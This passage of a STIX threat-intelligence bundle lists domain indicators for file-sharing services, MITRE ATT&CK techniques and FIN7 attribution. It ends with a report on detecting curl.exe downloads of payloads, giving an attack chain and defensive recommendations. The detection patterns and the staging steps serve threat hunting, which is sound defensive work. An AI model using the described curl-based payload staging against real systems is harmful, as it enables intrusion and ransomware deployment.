      "name": "domain: ddns.net",
      "pattern": "[domain-name:value = 'ddns.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cfe88aa6-2dbc-5524-99a6-419900adb50f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--ca0a9df2-bb9e-5922-850d-0f246fbc1c76"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--df2d4277-24f8-580b-9828-27f07c5d0f57",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: dl.dropboxusercontent.com",
      "pattern": "[domain-name:value = 'dl.dropboxusercontent.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4e012d3d-1403-5ce6-b3bc-6385b8f09897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--df2d4277-24f8-580b-9828-27f07c5d0f57"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d5046b16-ff19-579c-87b4-44207a7bba10",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ghostbin.co",
      "pattern": "[domain-name:value = 'ghostbin.co']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f49c45ff-b9df-5fd9-88ef-9b7b76540996",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--d5046b16-ff19-579c-87b4-44207a7bba10"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--dee5e8cb-314d-597d-a5f8-6f110aa32c91",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: github.com",
      "pattern": "[domain-name:value = 'github.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8c1c1fab-fbb9-547f-a6aa-a2b1918f59da",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--dee5e8cb-314d-597d-a5f8-6f110aa32c91"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8ee47930-c2cc-5729-82cb-50977e7bfdcb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: glitch.me",
      "pattern": "[domain-name:value = 'glitch.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bc335437-9e9f-5446-a9f8-3d9c49efcf5e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--8ee47930-c2cc-5729-82cb-50977e7bfdcb"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d4bdd661-82c5-5448-9fde-32f8f49805e4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: gofile.io",
      "pattern": "[domain-name:value = 'gofile.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--94a21a18-f779-59e1-a9fc-16aa91f2cf23",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--d4bdd661-82c5-5448-9fde-32f8f49805e4"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a755a0eb-79d1-5f3b-bfbb-8a63198af355",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: hastebin.com",
      "pattern": "[domain-name:value = 'hastebin.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8dba9f9b-f11d-5d12-84f5-f5fbb3cc943b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--a755a0eb-79d1-5f3b-bfbb-8a63198af355"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b19f1868-b4c6-530a-aa6f-d61e48807b7b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: mediafire.com",
      "pattern": "[domain-name:value = 'mediafire.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6c1daf46-deb5-5a5b-b6ea-1de751d95a5a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--b19f1868-b4c6-530a-aa6f-d61e48807b7b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--75b25e92-a95a-5fdb-bc7e-e65176b1c94b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: mega.nz",
      "pattern": "[domain-name:value = 'mega.nz']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--89eb5b64-548a-593a-a8b8-e141faca2298",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--75b25e92-a95a-5fdb-bc7e-e65176b1c94b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--aaea3d60-e8a8-5957-b3f2-e7043c325736",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: onrender.com",
      "pattern": "[domain-name:value = 'onrender.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4b09ce9d-9292-501c-8558-8c61284327e6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--aaea3d60-e8a8-5957-b3f2-e7043c325736"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e5b6cb33-c3a1-5d4e-be8c-98de6dc44bc1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pages.dev",
      "pattern": "[domain-name:value = 'pages.dev']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8b145198-60ef-5c9f-9e84-511d16e2459e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--e5b6cb33-c3a1-5d4e-be8c-98de6dc44bc1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8dc7bc1a-dabb-5c39-94f2-551359a17c70",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: paste.ee",
      "pattern": "[domain-name:value = 'paste.ee']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bea0add9-1b8c-5bde-8549-f770ba370016",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--8dc7bc1a-dabb-5c39-94f2-551359a17c70"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--afb55c71-8aac-5263-aefa-53c993d55870",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pastebin.com",
      "pattern": "[domain-name:value = 'pastebin.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5a018711-7d59-5480-af4f-cc108edd70a2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--afb55c71-8aac-5263-aefa-53c993d55870"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2c715570-7a74-5227-a42f-a299310a63be",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pastebin.pl",
      "pattern": "[domain-name:value = 'pastebin.pl']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--abe7e284-bfb0-5c2b-aaa9-fe95f99af53b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--2c715570-7a74-5227-a42f-a299310a63be"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1575c5b8-ad41-5a90-86e9-8cbf1ba44c48",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pastetext.net",
      "pattern": "[domain-name:value = 'pastetext.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6274e55f-c73b-544e-8566-1b85d5dc1a8c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--1575c5b8-ad41-5a90-86e9-8cbf1ba44c48"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--86185e43-f82e-57e8-a99f-f76e5e7449cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pixeldrain.com",
      "pattern": "[domain-name:value = 'pixeldrain.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e3bd163d-4e24-5783-b49b-1e9d299d0f70",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--86185e43-f82e-57e8-a99f-f76e5e7449cb"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b984d5c8-ba2f-5c9f-a6bd-a3b8547556e2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: privatlab.com",
      "pattern": "[domain-name:value = 'privatlab.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c3d70c71-4d3c-5189-b199-6f5fc09ae902",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--b984d5c8-ba2f-5c9f-a6bd-a3b8547556e2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--cda430dd-9283-5904-b3f5-0c06974fe3dc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: privatlab.net",
      "pattern": "[domain-name:value = 'privatlab.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c2f8ade4-7e7d-5821-8ca4-bd01450d7f8c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--cda430dd-9283-5904-b3f5-0c06974fe3dc"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9fb25c73-86c8-537a-9649-c6abf47d140e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: send.exploit.in",
      "pattern": "[domain-name:value = 'send.exploit.in']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ab45cb6f-362b-5057-bc13-2bbbfcb84edf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--9fb25c73-86c8-537a-9649-c6abf47d140e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9e4b36f6-31ac-50ad-ad2a-e6fa0afba7f7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: sendspace.com",
      "pattern": "[domain-name:value = 'sendspace.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cf3a8d65-ece9-5b99-80d7-21c4f939afd4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--9e4b36f6-31ac-50ad-ad2a-e6fa0afba7f7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f09b697f-e5a7-5776-a493-8c9cf091d54e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: storage.googleapis.com",
      "pattern": "[domain-name:value = 'storage.googleapis.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ee86d380-2565-56c8-9e1f-061c0ff5debd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--f09b697f-e5a7-5776-a493-8c9cf091d54e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5265b7c8-f709-5190-98a0-e41191d6529c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: storjshare.io",
      "pattern": "[domain-name:value = 'storjshare.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--288c7838-e9c0-590e-985f-b1ab6feec008",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--5265b7c8-f709-5190-98a0-e41191d6529c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--eec70cdb-4ec3-541a-af8f-9bb2f987ad60",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: supabase.co",
      "pattern": "[domain-name:value = 'supabase.co']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ebe59c37-85fa-5247-a714-e7a8fcc92005",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--eec70cdb-4ec3-541a-af8f-9bb2f987ad60"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--78e72751-1ea3-59a9-b7cb-5473954fc047",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: temp.sh",
      "pattern": "[domain-name:value = 'temp.sh']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5a115965-de9d-59dc-8896-2bffb783c5ef",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--78e72751-1ea3-59a9-b7cb-5473954fc047"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--be30ecfa-3f17-5e1f-ad47-5af1a6a4f37b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: transfer.sh",
      "pattern": "[domain-name:value = 'transfer.sh']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--95feb7ed-1712-5808-867e-4ee749b9f3ab",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--be30ecfa-3f17-5e1f-ad47-5af1a6a4f37b"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2a461528-3ed1-54b3-b6f3-6595a83838df",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: trycloudflare.com",
      "pattern": "[domain-name:value = 'trycloudflare.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--90ab4f79-4f4a-5da7-9dee-0b6d3d357277",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--2a461528-3ed1-54b3-b6f3-6595a83838df"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--28bfde1c-f69c-5415-a903-9fed8a9a18b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ufile.io",
      "pattern": "[domain-name:value = 'ufile.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--32e209ac-5e51-527f-974d-11f9d35af85c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--28bfde1c-f69c-5415-a903-9fed8a9a18b7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f1a765f6-0249-5482-b63e-e19cd10d0743",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: w3spaces.com",
      "pattern": "[domain-name:value = 'w3spaces.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--018fac57-d475-58e5-916d-d90ed382663c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--f1a765f6-0249-5482-b63e-e19cd10d0743"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c5969a3e-5b75-5288-9df4-75435e2f0bf3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: workers.dev",
      "pattern": "[domain-name:value = 'workers.dev']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--eccf6a2c-22ee-514f-a114-5e89009b2eca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--c5969a3e-5b75-5288-9df4-75435e2f0bf3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--613e1729-caec-5ff8-ab92-88558cad68d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: x0.at",
      "pattern": "[domain-name:value = 'x0.at']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:10:57Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--13431986-f89c-5e6e-a017-9042b8432337",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "indicator--613e1729-caec-5ff8-ab92-88558cad68d6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4c8161fc-184d-52b7-88ed-e77c35f508f9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--da024fbf-72f3-5d39-b261-1bd37742ea48",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2aa32bef-2cad-5daf-8735-8117648ab5d2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--f3cb2705-f750-5154-b23f-b58902dceddd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "FIN7"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4574e531-43e0-57bb-a42d-3eeb420e00e2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "target_ref": "threat-actor--f3cb2705-f750-5154-b23f-b58902dceddd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3718d3bc-6786-5289-9fdb-85656b1df941",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious File Download From File Sharing Domain Via Curl.EXE",
      "description": "## Overview\n\nThreat actors, including sophisticated groups like FIN7, are known to leverage legitimate system utilities such as `curl.exe` to download secondary stage payloads or malicious tools onto compromised Windows machines. This technique involves using `curl.exe` to connect to publicly accessible, but often abused, file-sharing services and CDNs (e.g., `githubusercontent.com`, `mega.nz`, `cdn.discordapp.com`) to retrieve executable binaries, scripts (`.ps1`, `.bat`), or dynamic link libraries (`.dll`). The activity is characterized by `curl.exe` command-line arguments specifying a download operation (e.g., `-O`, `--remote-name`, `--output`) and targeting specific file extensions. This method allows adversaries to bypass traditional perimeter defenses and introduce hostile code into a network, establishing persistence, escalating privileges, or preparing for data exfiltration and ransomware deployment. This behavior was highlighted in a detection rule originally published in May 2023 and updated in March 2026.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker gains initial access to a Windows system, possibly through spearphishing, exploiting a vulnerable service, or compromised credentials.\n2.  **Execution of Initial Command**: The attacker establishes a foothold and executes an initial command-and-control mechanism or interactive shell (e.g., PowerShell, cmd.exe).\n3.  **Ingress Tool Transfer**: `curl.exe` is launched from the command line with parameters to download additional malicious tools or payloads from an external source.\n4.  **Suspicious Download**: `curl.exe` connects to a public file-sharing or content delivery network (CDN) domain (e.g., `githubusercontent.com`, `mega.nz`, `cdn.discordapp.com`) to retrieve a file.\n5.  **Payload Staging**: The malicious file (e.g., `.exe`, `.ps1`, `.dll`, `.msi`) is saved to a specific location on the compromised system, often a temporary directory or a less scrutinized path.\n6.  **Secondary Payload Execution**: The downloaded malicious payload is executed, leading to further compromise, such as establishing persistence, escalating privileges, deploying ransomware, or exfiltrating data.\n\n## Impact\n\nSuccessful exploitation results in the introduction and execution of arbitrary malicious code on the compromised system. This can lead to severe consequences including, but not limited to, full system compromise, data exfiltration, deployment of ransomware, establishment of persistent backdoors for long-term access, and lateral movement within the network. The specific impact depends on the nature of the downloaded payload, but the use of legitimate tools like `curl.exe` increases the likelihood of unnoticed initial compromise and enables sophisticated post-exploitation activities, potentially affecting multiple systems across an organization.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Suspicious File Download From File Sharing Domain Via Curl.EXE\" to your SIEM and tune for your environment to detect `curl.exe` activity.\n*   Enable comprehensive process creation logging (e.g., via Sysmon) to ensure visibility into `curl.exe` executions and their command-line arguments.\n*   Review network egress logs for connections to the file-sharing domains listed in the IOC section, especially when initiated by non-standard processes.\n*   Implement application control policies to restrict unauthorized execution of `curl.exe` or its use to download specific file types from untrusted sources.\n",
      "published": "2026-07-03T15:10:57Z",
      "labels": [
        "curl",
        "download",
        "file-sharing",
        "ingress-tool-transfer",
        "windows",
        "threat-hunting"
      ],
      "object_refs": [
        "indicator--f6be8911-020b-5eb5-97ae-e58b84a254e9",
        "indicator--8b970e10-084b-5528-ac0f-66e3e9f397b9",
        "indicator--f2565d65-eab6-5e66-b9b0-4d3256fb51a3",
        "indicator--97c01e5b-14bb-5e2e-a60e-d82ba5a99577",
        "indicator--8bf729ab-f8ce-5d46-a4b9-d9e604a4915d",
        "indicator--8a6ab030-330b-554c-9bb4-1010e628d120",
        "indicator--ca0a9df2-bb9e-5922-850d-0f246fbc1c76",
        "indicator--df2d4277-24f8-580b-9828-27f07c5d0f57",
        "indicator--d5046b16-ff19-579c-87b4-44207a7bba10",
        "indicator--dee5e8cb-314d-597d-a5f8-6f110aa32c91",
        "indicator--8ee47930-c2cc-5729-82cb-50977e7bfdcb",
        "indicator--d4bdd661-82c5-5448-9fde-32f8f49805e4",
        "indicator--a755a0eb-79d1-5f3b-bfbb-8a63198af355",
